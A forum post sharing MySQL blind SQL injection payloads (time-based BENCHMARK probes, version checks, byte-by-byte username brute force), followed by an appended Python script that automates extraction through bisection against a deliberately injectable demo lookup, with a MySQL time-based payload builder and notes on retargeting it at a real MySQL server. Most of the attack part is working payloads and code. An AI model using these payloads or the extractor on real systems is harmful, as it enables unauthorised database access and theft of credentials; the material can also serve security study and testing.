[SQLi] Blind SQLi queries

Credits: Rouge Coder @ Intosec

Rouge Coder wrote: First off, as the title says, this is not a tutorial. I've been messing around keeping my skills fresh today and wrote down some blind SQLi queries that I used, and thought I'd share them here.

Code:
// All payloads below target MySQL and assume the input lands inside a WHERE clause.
// MySQL only treats "--" as a comment when it is followed by a space or newline,
// so keep the trailing space after the dashes.

// Check for blind injection vulnerability (time-based): 1=2 is always false, so the
// BENCHMARK branch always runs; a noticeable delay means the input reached the query
OR (IF (1=2, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) -- 

// Check for subselect support
OR (SELECT 1)=1 -- 

// Find version (boolean-based): the row only comes back if the major version is 4
AND SUBSTRING(@@version,1,1) = 4 -- 

// Find length of database user. Note the IF: the delay fires only when the condition
// is FALSE, so a slow response here means LENGTH(user()) <= 1
OR (IF (LENGTH(user()) > 1, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) -- 

// Brute-force database username (65 = A -> 90 = Z, 97 = a -> 122 = z)
// Same inverted logic: a delay means the byte at that position is <= 65; raise or
// lower the threshold and repeat until the value is pinned down
OR (IF (ASCII(SUBSTRING(user(),1,1)) > 65, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) -- // Find first letter
OR (IF (ASCII(SUBSTRING(user(),2,1)) > 65, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) -- // Find second letter
OR (IF (ASCII(SUBSTRING(user(),3,1)) > 65, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) -- // Find third letter

There's of course a lot more that can be done here, but this should at least give newcomers a decent idea about how blind SQL injection works.
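The post shows single probes of the form ASCII(SUBSTRING(user(),i,1)) > 65; the part it leaves out is how those probes are driven to recover a whole value. The script below is an added example, not Rouge Coder's code or anything from the Intosec thread. It builds a constructed stand-in for the vulnerable application (an in-memory SQLite table with made-up rows, and a hypothetical lookup that concatenates input into the query), then pulls a secret out one byte at a time by bisecting LENGTH(...) and UNICODE(SUBSTR(...)) over a boolean oracle. SQLite is used because it ships with Python and has no BENCHMARK(); it spells the MySQL ASCII()/SUBSTRING() functions as UNICODE()/SUBSTR(). The time-based variant from the post differs only in how the oracle decides yes or no (elapsed time instead of rows returned), so the post's IF/BENCHMARK wrapper is included as a payload builder to show the mapping and its inverted logic.

```python
import sqlite3
from typing import Callable


# Constructed stand-in for the vulnerable application: an SQLite database with
# made-up rows. Only the attacker-controlled string is concatenated into SQL.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "Xk9!pass"), ("guest", "guest")])
    return conn


class VulnerableApp:
    """Hypothetical lookup that splices user input straight into the query."""

    def __init__(self) -> None:
        self.conn = build_db()

    def user_exists(self, name: str) -> bool:
        # The bug: string concatenation instead of a bound parameter.
        sql = "SELECT name FROM users WHERE name = '" + name + "'"
        return self.conn.execute(sql).fetchone() is not None


Oracle = Callable[[str], bool]


def boolean_oracle(app: VulnerableApp, condition: str) -> bool:
    # Same shape as the post's payloads: close the string, OR in a condition,
    # comment out the rest. Any row coming back means the condition was true.
    return app.user_exists("' OR (" + condition + ") -- ")


def mysql_time_payload(condition: str, iterations: int = 10_000_000) -> str:
    """Wrap a condition in the post's MySQL time-based shape (string only, not run here).

    IF(cond, null, BENCHMARK(...)) stalls when the condition is FALSE, so with this
    wrapper a slow response means "no" and a fast one means "yes".
    """
    return ("' OR (IF (" + condition + ", null, BENCHMARK("
            + str(iterations) + ", ENCODE('MSG', 'by 5 seconds')))) -- ")


def bisect_value(oracle: Oracle, expr: str, lo: int, hi: int) -> int:
    """Find the integer value of `expr` in [lo, hi] using only `expr > N` questions."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(expr + " > " + str(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(oracle: Oracle, expr: str, max_len: int = 64) -> str:
    # Step 1: length, as in the post's LENGTH(user()) > N probe.
    # Step 2: each byte, as in the post's ASCII(SUBSTRING(user(), i, 1)) > N probe,
    # bisected over 0..127 so each character costs 7 questions instead of up to 127.
    length = bisect_value(oracle, "LENGTH(" + expr + ")", 0, max_len)
    return "".join(
        chr(bisect_value(oracle, "UNICODE(SUBSTR(" + expr + ", " + str(i) + ", 1))", 0, 127))
        for i in range(1, length + 1)
    )


def run_demo() -> tuple:
    """Pull the admin secret out through the boolean oracle; returns (secret, query_count)."""
    app = VulnerableApp()
    count = 0

    def counting_oracle(condition: str) -> bool:
        nonlocal count
        count += 1
        return boolean_oracle(app, condition)

    secret = extract_string(counting_oracle, "(SELECT secret FROM users WHERE name = 'admin')")
    return secret, count


if __name__ == "__main__":
    secret, n = run_demo()
    print(f"recovered {secret!r} with {n} queries")
    print("MySQL time-based form of one probe:", mysql_time_payload("LENGTH(user()) > 1"))
```

Against the constructed table the eight-character secret comes back in 62 queries (6 to bisect the length over 0..64, then 7 per character). To point the same extractor at a MySQL target you would replace boolean_oracle with one that sends mysql_time_payload(condition) and returns True when the response is fast, and swap UNICODE/SUBSTR for ASCII/SUBSTRING in extract_string.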

